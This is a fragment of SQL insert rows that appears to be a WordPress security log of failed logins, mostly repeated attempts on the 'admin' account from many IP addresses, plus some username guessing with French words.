(102215, 1498504310.017285, 1, 'loginFailValidUsername', 'admin', 1, 2945134175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102216, 1498504311.440390, 1, 'loginFailValidUsername', 'admin', 1, 2945134175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102217, 1498507812.486418, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102218, 1498508323.214093, 1, 'loginFailValidUsername', 'admin', 1, 84052156, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102219, 1498508324.278503, 1, 'loginFailValidUsername', 'admin', 1, 84052156, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102220, 1498508481.177724, 1, 'loginFailValidUsername', 'admin', 1, 624440655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102221, 1498508482.313273, 1, 'loginFailValidUsername', 'admin', 1, 624440655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102222, 1498510068.291742, 1, 'loginFailValidUsername', 'admin', 1, 1920812584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102223, 1498510069.966092, 1, 'loginFailValidUsername', 'admin', 1, 1920812584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102224, 1498513470.111392, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102225, 1498519330.511965, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102226, 1498520871.785007, 1, 'loginFailValidUsername', 'admin', 1, 2945444222, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102227, 1498525468.051395, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102228, 1498527952.012639, 1, 'loginFailValidUsername', 'admin', 1, 2249451108, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102229, 1498527974.146690, 1, 'loginFailValidUsername', 'admin', 1, 2074143869, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102230, 1498527976.648196, 1, 'loginFailValidUsername', 'admin', 1, 3708042678, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102231, 1498530359.663677, 1, 'loginFailValidUsername', 'admin', 1, 3169050734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102232, 1498530361.437691, 1, 'loginFailValidUsername', 'admin', 1, 3169050734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102233, 1498532986.152135, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102234, 1498534157.917634, 1, 'loginFailValidUsername', 'admin', 1, 1238903534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102235, 1498534159.165432, 1, 'loginFailValidUsername', 'admin', 1, 1238903534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102236, 1498538584.894726, 1, 'loginFailValidUsername', 'admin', 1, 3186141464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102237, 1498538688.475140, 1, 'loginFailValidUsername', 'admin', 1, 1658211787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102238, 1498538689.581145, 1, 'loginFailValidUsername', 'admin', 1, 1658211787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102239, 1498539256.510635, 1, 'loginFailValidUsername', 'admin', 1, 1847911477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102240, 1498539258.295880, 1, 'loginFailValidUsername', 'admin', 1, 1847911477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102241, 1498540416.137978, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102242, 1498544154.250332, 1, 'loginFailValidUsername', 'admin', 1, 3171346976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102243, 1498544155.723435, 1, 'loginFailValidUsername', 'admin', 1, 3171346976, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102244, 1498545263.734403, 1, 'loginFailValidUsername', 'admin', 1, 3169869618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102245, 1498545267.648472, 1, 'loginFailValidUsername', 'admin', 1, 3169869618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102246, 1498547711.468306, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102247, 1498551665.100191, 1, 'loginFailValidUsername', 'admin', 1, 1768737787, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102248, 1498553769.866946, 1, 'loginFailValidUsername', 'admin', 1, 1411255171, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102249, 1498553770.794968, 1, 'loginFailValidUsername', 'admin', 1, 1411255171, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102250, 1498555411.675944, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102251, 1498555788.959911, 1, 'loginFailValidUsername', 'admin', 1, 2851037189, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102252, 1498556017.818152, 1, 'loginFailValidUsername', 'admin', 1, 1868053842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102253, 1498556019.303215, 1, 'loginFailValidUsername', 'admin', 1, 1868053842, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102254, 1498556752.676435, 1, 'loginFailValidUsername', 'admin', 1, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102255, 1498556754.200760, 1, 'loginFailValidUsername', 'admin', 1, 3553507500, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102256, 1498558064.161479, 1, 'loginFailValidUsername', 'admin', 1, 2960424783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102257, 1498558065.165960, 1, 'loginFailValidUsername', 'admin', 1, 2960424783, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102258, 1498558174.176940, 1, 'loginFailValidUsername', 'admin', 1, 3390398482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102259, 1498558176.210367, 1, 'loginFailValidUsername', 'admin', 1, 3390398482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102260, 1498560090.633869, 1, 'loginFailValidUsername', 'admin', 1, 1730443484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102261, 1498560093.313233, 1, 'loginFailValidUsername', 'admin', 1, 1730443484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102262, 1498563350.386352, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102263, 1498566126.051721, 1, 'loginFailValidUsername', 'admin', 1, 3306065029, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102264, 1498568593.539866, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.80.33 (KHTML, like Gecko) Chrome/56.3.8190.4452 Safari/534.40 OPR/44.5.0903.5275'),
(102265, 1498569964.589538, 1, 'loginFailValidUsername', 'admin', 1, 1892086715, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102266, 1498569966.222692, 1, 'loginFailValidUsername', 'admin', 1, 1892086715, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102267, 1498571239.550512, 1, 'loginFailValidUsername', 'admin', 1, 3154261957, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102268, 1498571240.548833, 1, 'loginFailValidUsername', 'admin', 1, 3154261957, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102269, 1498571321.837763, 1, 'loginFailValidUsername', 'admin', 1, 248164304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102270, 1498571323.597796, 1, 'loginFailValidUsername', 'admin', 1, 248164304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102271, 1498572496.502681, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102272, 1498572531.085227, 1, 'loginFailValidUsername', 'admin', 1, 94071740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102273, 1498572532.717313, 1, 'loginFailValidUsername', 'admin', 1, 94071740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102274, 1498574278.538366, 1, 'loginFailValidUsername', 'admin', 1, 2630961947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102275, 1498574279.987814, 1, 'loginFailValidUsername', 'admin', 1, 2630961947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102276, 1498574476.667656, 1, 'loginFailValidUsername', 'admin', 1, 1332444473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102277, 1498574477.788314, 1, 'loginFailValidUsername', 'admin', 1, 1332444473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102278, 1498574661.204432, 1, 'loginFailValidUsername', 'admin', 1, 1323285511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102279, 1498574662.250134, 1, 'loginFailValidUsername', 'admin', 1, 1323285511, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102280, 1498576342.392683, 1, 'loginFailValidUsername', 'admin', 1, 3375800366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102281, 1498576343.745527, 1, 'loginFailValidUsername', 'admin', 1, 3375800366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102282, 1498578060.758058, 1, 'loginFailValidUsername', 'admin', 1, 1706264425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102283, 1498578062.345580, 1, 'loginFailValidUsername', 'admin', 1, 1706264425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102284, 1498578729.121845, 1, 'loginFailValidUsername', 'admin', 1, 3385851916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102285, 1498578731.081679, 1, 'loginFailValidUsername', 'admin', 1, 3385851916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102286, 1498579849.681285, 1, 'loginFailInvalidUsername', 'center', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102287, 1498579851.792010, 1, 'loginFailValidUsername', 'julie', 2, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102288, 1498579853.919528, 1, 'loginFailValidUsername', 'pablo', 3, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102289, 1498579856.078273, 1, 'loginFailInvalidUsername', 'vous', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102290, 1498579858.181545, 1, 'loginFailInvalidUsername', 'training', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102291, 1498579860.276136, 1, 'loginFailInvalidUsername', 'notre', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102292, 1498579862.425939, 1, 'loginFailInvalidUsername', 'pour', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102293, 1498579864.727935, 1, 'loginFailInvalidUsername', 'cross', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102294, 1498579866.862517, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102295, 1498579868.963063, 1, 'loginFailInvalidUsername', 'venez', 0, 2915681446, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102296, 1498580820.933403, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102297, 1498581039.739187, 1, 'loginFailInvalidUsername', 'outils', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102298, 1498581041.446345, 1, 'loginFailInvalidUsername', 'professionnel', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102299, 1498581043.154754, 1, 'loginFailInvalidUsername', 'travail', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102300, 1498581044.848951, 1, 'loginFailInvalidUsername', 'namur', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102301, 1498581046.564839, 1, 'loginFailInvalidUsername', 'center', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102302, 1498581048.232936, 1, 'loginFailValidUsername', 'julie', 2, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102303, 1498581049.918979, 1, 'loginFailValidUsername', 'pablo', 3, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102304, 1498581051.573375, 1, 'loginFailInvalidUsername', 'vous', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102305, 1498581053.232818, 1, 'loginFailInvalidUsername', 'training', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102306, 1498581055.079874, 1, 'loginFailInvalidUsername', 'notre', 0, 788319643, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102307, 1498581166.916992, 1, 'loginFailValidUsername', 'admin', 1, 838128343, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102308, 1498581168.916716, 1, 'loginFailValidUsername', 'admin', 1, 838128343, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102309, 1498583779.218728, 1, 'loginFailValidUsername', 'admin', 1, 1868302956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102310, 1498583781.153512, 1, 'loginFailValidUsername', 'admin', 1, 1868302956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102311, 1498585000.817670, 1, 'loginFailValidUsername', 'admin', 1, 3194270743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102312, 1498585002.297991, 1, 'loginFailValidUsername', 'admin', 1, 3194270743, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102313, 1498585833.459636, 1, 'loginFailValidUsername', 'admin', 1, 3065401114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102314, 1498585836.462678, 1, 'loginFailValidUsername', 'admin', 1, 3065401114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102315, 1498588215.420499, 1, 'loginFailValidUsername', 'admin', 1, 3015351469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102316, 1498588216.858074, 1, 'loginFailValidUsername', 'admin', 1, 3015351469, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102317, 1498589505.673781, 1, 'loginFailValidUsername', 'admin', 1, 629565994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102318, 1498589506.768945, 1, 'loginFailValidUsername', 'admin', 1, 629565994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102319, 1498591804.616847, 1, 'loginFailValidUsername', 'admin', 1, 3680228229, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102320, 1498591807.552284, 1, 'loginFailValidUsername', 'admin', 1, 3680228229, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102321, 1498591930.068788, 1, 'loginFailValidUsername', 'admin', 1, 1731167294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102322, 1498591931.749592, 1, 'loginFailValidUsername', 'admin', 1, 1731167294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102323, 1498593685.986165, 1, 'loginFailValidUsername', 'admin', 1, 1329715728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102324, 1498593687.157393, 1, 'loginFailValidUsername', 'admin', 1, 1329715728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102325, 1498596170.307763, 1, 'loginFailValidUsername', 'admin', 1, 1048591873, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102326, 1498597669.629783, 1, 'loginFailValidUsername', 'admin', 1, 3000074456, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102327, 1498597670.620607, 1, 'loginFailValidUsername', 'admin', 1, 3000074456, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102328, 1498598411.424593, 1, 'loginFailValidUsername', 'admin', 1, 1908305645, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102329, 1498599851.253686, 1, 'loginFailValidUsername', 'admin', 1, 3188315001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102330, 1498599853.116129, 1, 'loginFailValidUsername', 'admin', 1, 3188315001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102331, 1498605265.737724, 1, 'loginFailValidUsername', 'admin', 1, 3206891535, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102332, 1498605267.280983, 1, 'loginFailValidUsername', 'admin', 1, 3206891535, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102333, 1498609906.093302, 1, 'loginFailValidUsername', 'admin', 1, 755475457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102334, 1498610198.756113, 1, 'loginFailValidUsername', 'admin', 1, 3293189371, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102335, 1498610929.904968, 1, 'loginFailValidUsername', 'admin', 1, 3216151749, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102336, 1498613404.743297, 1, 'loginFailValidUsername', 'admin', 1, 3010235177, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102337, 1498613410.370514, 1, 'loginFailValidUsername', 'admin', 1, 3010235177, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102338, 1498614947.485583, 1, 'loginFailValidUsername', 'admin', 1, 1118517223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102339, 1498614948.779139, 1, 'loginFailValidUsername', 'admin', 1, 1118517223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102340, 1498616898.825313, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.35 (KHTML, like Gecko) Chrome/57.4.9471.4743 Safari/534.53 OPR/44.5.0193.6456'),
(102341, 1498620162.766831, 1, 'loginFailValidUsername', 'admin', 1, 84796080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102342, 1498621536.252652, 1, 'loginFailValidUsername', 'admin', 1, 973497450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102343, 1498623506.698881, 1, 'loginFailValidUsername', 'admin', 1, 3373725554, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102344, 1498623508.037379, 1, 'loginFailValidUsername', 'admin', 1, 3373725554, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102345, 1498623644.940874, 1, 'loginFailValidUsername', 'admin', 1, 1744766720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102346, 1498623646.692281, 1, 'loginFailValidUsername', 'admin', 1, 1744766720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102347, 1498626401.351600, 1, 'loginFailValidUsername', 'admin', 1, 1540281015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102348, 1498626402.373606, 1, 'loginFailValidUsername', 'admin', 1, 1540281015, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102349, 1498628480.132301, 1, 'loginFailValidUsername', 'admin', 1, 2944382474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102350, 1498628481.605591, 1, 'loginFailValidUsername', 'admin', 1, 2944382474, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102351, 1498630310.114501, 1, 'loginFailValidUsername', 'admin', 1, 1887825675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102352, 1498630311.585040, 1, 'loginFailValidUsername', 'admin', 1, 1887825675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102353, 1498633028.693905, 1, 'loginFailValidUsername', 'admin', 1, 3671480802, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102354, 1498633030.328807, 1, 'loginFailValidUsername', 'admin', 1, 3671480802, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102355, 1498636115.747338, 1, 'loginFailValidUsername', 'admin', 1, 1422096801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102356, 1498636116.784364, 1, 'loginFailValidUsername', 'admin', 1, 1422096801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102357, 1498640849.061543, 1, 'loginFailValidUsername', 'admin', 1, 627695844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102358, 1498640850.623857, 1, 'loginFailValidUsername', 'admin', 1, 627695844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102359, 1498643875.588148, 1, 'loginFailValidUsername', 'admin', 1, 3276546481, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102360, 1498643876.798761, 1, 'loginFailValidUsername', 'admin', 1, 3276546481, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102361, 1498644716.408975, 1, 'loginFailValidUsername', 'admin', 1, 1046105368, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102362, 1498644717.484357, 1, 'loginFailValidUsername', 'admin', 1, 1046105368, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102363, 1498644940.190462, 1, 'loginFailValidUsername', 'admin', 1, 656968908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
